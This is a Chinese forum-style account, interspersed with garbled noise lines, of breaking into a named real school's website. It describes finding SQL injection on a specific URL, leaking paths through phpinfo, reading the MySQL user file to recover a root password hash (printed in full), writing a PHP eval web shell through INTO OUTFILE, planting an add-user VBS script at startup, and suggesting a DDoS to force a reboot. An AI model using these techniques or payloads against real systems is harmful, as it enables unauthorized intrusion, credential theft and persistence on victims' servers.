友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
* I  w4 ]5 u1 d0 y发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
8 y9 Z8 w: p; Z* \: b
8 ~3 R# f- f+ o4 w% F5 w) d

8 W" G" s9 j8 e5 ^  d& }常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
- x% U3 x: G9 P. D, o" [% H+ i0 {
. k7 Y' ~$ Q1 z- N5 r+ a2 ~那么想可以直接写入shell ，getshell有几个条件：
# ~1 J% a& x# V

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

# r9 D  [3 m" h$ ~# w: n1 d试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
) t! T: |6 X& p( [2./phpMyAdmin/phpinfo.php  
& z" F# z- |) T3./load_file()  
5 d; i& @% H: n, B3 Z( h' _4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
( e( D9 k- r: p$ y* S9 N1 E9 t' S6./phpmyadmin/libraries/lect_lang.lib.php  
% S5 N4 G, Q" e' e/ @0 W' @1 e( ^7./phpmyadmin/libraries/mcrypt.lib.php   
4 O/ S( Z7 h' y, V) l: `. t9 G8./phpmyadmin/libraries/export/xls.php  

% A# }8 Y5 @5 }# D均不行...........................
1 c# Y) r- f3 B- F! l( [
1 S& r6 o" ?1 J3 W6 ]. G御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
+ U! P+ d& [  D& c" |8 K7 V8 Z
/ _: O3 Y7 ?% s- Z9 G  w* D权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

( j$ D) d/ f4 A默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
' l! X& v9 ~1 {9 v6 n6 P2 b
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
" U  |! a6 A. A0 }% Q/ E" W
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
3 m% G( i/ d8 \+ B1 C/ `! Z
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

. i! c5 O( Q: ^& n3 Z" w成功读到root密码：
0 L; a4 f) a+ Y$ Z4 K- p
4 I# W+ u$ h, d% Z4 z17---- r(0072)
8 h0 G" r* p3 W: z* l18---- o(006f)
19---- o(006f)
20---- t(0074)
: C# \3 s) h* v) X21---- *(002a)
1 ^/ A3 u6 @9 Y. [% k22---- 8(0038)
23---- 2(0032)
! b  t9 Z) {) A9 J" j8 D24---- E(0045)
25---- 1(0031)
0 Y  c* P% i: Q. w  P8 ^. [26---- C(0043)
27---- 5(0035)
" O% C) U4 `9 v28---- 8(0038)
5 G; s6 O4 ~! }7 D$ K29---- 2(0032)
30---- 8(0038)
5 Y) M- k, E% z& f8 F31---- A(0041)
: f: ^$ S) N2 z$ Z2 K  A+ O32---- 9(0039)
% ~( z+ P  `2 z+ D+ X( ~/ o  h& t, `# U33---- B(0042)
34---- 5(0035)
$ b8 \1 r. g; M0 m$ u5 u35---- 4(0034)
36---- 8(0038)
6 ^, X5 q3 Z8 h! k6 A( U% J37---- 6(0036)
8 p7 z) q! _/ F9 ^/ B: _; ^* L38---- 4(0034)
3 p% `3 m' ^. V39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
, ]  M- s$ \# Z! \) w! _42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
0 Y+ n3 b- f' z0 j2 A47---- F(0046)
& k0 ^# r  W; V0 b48---- F(0046)
. N- w  V5 Q; J1 K! Y) L49---- 4(0034)
50---- F(0046)
% P4 d/ r% @3 y3 k# d! G" \4 \$ o51---- 0(0030)
52---- 3(0033)
' ?8 Z% |- C- h6 G- r1 r1 Z53---- 2(0032)
; g# O/ A- u& C0 x54---- A(0041)
: G) H: Y( O$ _. ?. X% z- Y/ h55---- 4(0034)
56---- A(0041)
6 O# \- }* S9 u* Y57---- B(0042)
! }  I; w% Z6 ^$ }. ?2 \# q; _58---- *(0044)
59---- *(0035)
# U) l# I. j- ]: t* [60---- *(0041)
61---- *0032)
! B6 y( h' b. ~1 |3 l
解密后成功登陆phpmyamin
" p& E8 u$ q! s, t                          
: U0 h7 r8 i3 Q* t0 W
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

( q6 O8 {3 X, ]5 v2 D* w- |' M5 E成功执行，拿下shell，菜刀连接：
2 O& w* o; ?( C
服务器不支持asp,aspx,php提权无果...................
8 @, L$ B! }+ M4 L5 E& }
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

& ^- A3 N+ n( {

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

4 l, |, l5 n7 Y6 F: Z' y3 i

-------------------------------------------------------------------------------
admin
Administrator
5 J9 i% P3 D. tslipper$
6 Q+ C4 A6 }( \8 K8 c+ V8 ^sqluser
命令成功完成。
8 P$ D! p2 C$ k7 d$ C
8 h4 E/ W6 E6 g3 N% u/ R; t! ]9 v' M& x服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
/ b! d+ ^: I0 y6 P
' U- R# _7 {8 ^' _4 T0 l3 h/ F      

angel